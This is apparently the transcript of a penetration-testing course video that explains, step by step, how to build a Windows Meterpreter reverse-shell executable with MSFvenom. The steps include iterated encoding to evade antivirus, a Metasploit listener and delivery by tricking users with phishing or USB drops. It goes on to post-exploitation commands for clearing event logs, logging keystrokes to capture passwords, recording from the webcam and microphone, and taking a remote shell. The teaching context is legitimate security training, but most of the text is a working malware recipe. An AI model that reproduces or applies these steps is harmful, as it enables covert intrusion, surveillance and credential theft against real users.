In this demonstration, you'll learn how to create malicious payload with MSFvenom. In this example, we're going to use MSFvenom to create malicious software that when the user runs that software, it makes a reverse connection back to our penetration testing system, giving us full control of the victim system. The first step is we want to make note of what our IP address is on our Kali Linux system. So I'm going to do an ifconfig, and notice that the IP address is 10.0.0.7. So I make a note of that. Now I'm going to clear the screen. And the next thing we want to do is to create the malicious software. And the command to do that is we're going to use MSFvenom space. We're going to use a -p to specify the payload. And the payload is the attack that we're performing. And in this case, we want to use a Meterpreter payload that makes a reverse connection to the Kali Linux system. So that exploit is going to be Windows/Meterpreter/reverse_TCP. Then we specify the local host setting, which is going to be the value or the IP address of your Kali Linux system. So in my case, it's 10.0.0.7. Then we specify the local port. And this is going to be the port that we want the malicious software to connect to on that Kali Linux system. So I'm going to specify a port of 5555. Then we specify our architecture with a -a, and I'm going to go with x86. Then we specify our platform with --platform. And the platform is going to be, this is going to be a program that we're generating that runs on the Windows platform. Then we're going to specify our encoder. So there's different types of encoders that could be used to create the malicious software. In this example, I'm going to use the x86/Shikata_GA_NAI. And you can view the help to see some different encoders that are supported by MSFvenom. Then we specify a -f, which is the file type that we want to create with MSFvenom. So this malicious software is going to be an exe file, is what I want to generate. Then we specify a -i, which is how many iterations we want to encode the malicious software. And the concept here is that the more encoding iterations you do, the less likely your virus protection software will detect the malware. So I'm going to go with 15 iterations. And then we're going to specify a greater than sign so that we write the output of MSFvenom to a file called, and I'm going to call it course10_malware.exe. And then we hit enter. So it generates the executable. If I do an ls command, I should see our course10 malware executable is here. So this malware, when somebody runs it, will make a reverse connection to our system. Perfect. Now, before we send that malware out to somebody, the next thing that we want to do is we want to set up our Kali Linux system to be a listener. A listener is waiting for somebody to connect to us. So to create a listener, we use MSF console. And that's going to start our Metasploit Framework. Once in the Metasploit prompt, then we use the exploit multi-handler. So I press enter there. Once I use the exploit, then I'm going to set the payload to Windows Meterpreter/reverse_TCP. Then I'll set the host or local host address to the IP address of the Kali Linux system. So 10.0.0.7. and then I'll run my exploit. So I forgot to change the port number there. So I'm going to do a Control-C here and stop that. If you use your show options command, once you're on the exploit, you can see a list of the options. And notice that on the left-hand side here, I've got my local host address is set. The local port is set to port 444, but remember when I created the malicious software, I set the port to 5555. So I need to set that. So I'm going to do a set L port to space 1, 2, 3, 4, 4 fives. Hit enter. I'll do my show options just to make sure that it's set it properly. So I have my local host address set to 10.0.0.7. I have the local port that I'm going to listen on set to 5555. Perfect. Now I'll run the exploit. So you'll notice that it says started a reverse TCP handler on 10.0.0.7 colon 5555. That's the port number. So at this point, I don't have a command prompt where I can type anything because this prompt is sitting there idle, waiting for a victim to run that program, which will make a connection to this listener. So what I'm going to do next is I'm going to switch over to the Windows client where the user is tricked into running the program. So I'm at the Windows client. Now, what would happen normally is you would trick the user into running the program either through an email message, like a social engineer attack, or what you would do is put the program on a USB stick, and then you would do a USB drop where you spread a bunch of USB sticks around the organization, hoping somebody throws the USB stick inside a system and runs the program out of curiosity. So either way, once you trick the person into running the program, so here's the program, I'm going to double click on it and run that program. So I do get a message here on the Smart Screen feature. Can't communicate out to the internet. That's fine. I'm going to choose to run. And now what I'm going to do is switch over to the hacker's system. So I've switched back to the attacker system, or in this case, the pen tester, and you can see here that we no longer just have the idle prompt of started reverse TCP handler. You'll notice that we do have a connection to 10.0.0.6, so that must be the IP address of the Windows 10 client, and we have a meterpreter session. Now with this meterpreter session, we can perform a number of different meterpreter commands, they're called. And you can get a list of the different meterpreter commands by doing a question mark. So if I do question mark and hit enter, here is a list of all of the different meterpreter commands. And just to highlight a few of these, if I scroll to the top, so we do have things like, if I scroll down, file system commands. So there are commands for you to look at the contents of files on the target system, delete files, create files, download and upload files, make directories, that kind of idea. So all kinds of commands on that. We do have some networking commands as well. So things like your ipconfig and netstat commands are there. We do have some system commands. So things like, this is interesting, clear EV, which clears the event log. So if you want to kind of remove any kind of auditing that's happened after you've made a bunch of changes to the system, you could try the clear EV. There's a sysinfo command, which is what I'm going to use, and that'll retrieve information about the system that is connected to your pen test system. We also have commands to work with things like keystroke logging, so I can record the keystrokes of the user, try to capture their passwords. There's a screenshot command to grab a screenshot of the user interface. There's webcam commands, which allow you to do things like, record an audio file from the microphone of the webcam, or take a snapshot of the user with the webcam. All kinds of things like that. So what I'm going to do is I'm going to try a few of these commands out here. I'm going to do a sysinfo first to obtain information about the system. Notice that the computer that's connected to us at this time is Skillsoft Win10A, and it's a Windows 10 machine with a 64-bit architecture. Perfect. So we know the system information. And then we could do a number of other things. So for instance, I could use the shell command, which will jump me into a Windows command prompt of that system. So if I do the shell command, and now notice that my prompt has changed, I'm in C:\/ excluded is the folder. So if I do a dir, right, I can see a listing of the files that exist on that system. I could go and create files, copy files, like use all my typical Windows commands if I wanted to, right? If you want to get out of your shell, you type exit, and that'll put me back in the Meterpreter session where I can use any of those Meterpreter commands. So in this demonstration, you saw how to use MSFvenom to create malicious software.